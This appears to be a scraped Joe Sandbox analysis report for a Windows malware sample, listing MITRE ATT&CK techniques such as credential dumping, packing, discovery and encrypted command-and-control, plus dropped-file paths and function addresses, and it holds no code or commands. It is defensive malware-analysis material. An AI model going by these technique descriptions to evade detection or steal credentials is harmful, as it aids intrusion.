Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report 0Z2lZiPk5K.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

E-Banking Fraud

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\0Z2lZiPk5K.exe.log

C:\Users\user\AppData\Local\Temp\40182GJpK

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Network Behavior

Suricata IDS Alerts

Network Port Distribution

TCP Packets

Windows Analysis Report
0Z2lZiPk5K.exe

Function 07EE8761 Relevance: 5.5, Instructions: 5514
COMMON

Function 07EE8770 Relevance: 5.5, Instructions: 5506
COMMON

Function 02BF4028 Relevance: 5.4, Strings: 4, Instructions: 444
COMMON

Function 064E7598 Relevance: 5.2, Instructions: 5220
COMMON

Function 0853E368 Relevance: 5.2, Strings: 4, Instructions: 190
COMMON

Function 07EE334C Relevance: 4.0, Strings: 3, Instructions: 259
COMMON

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre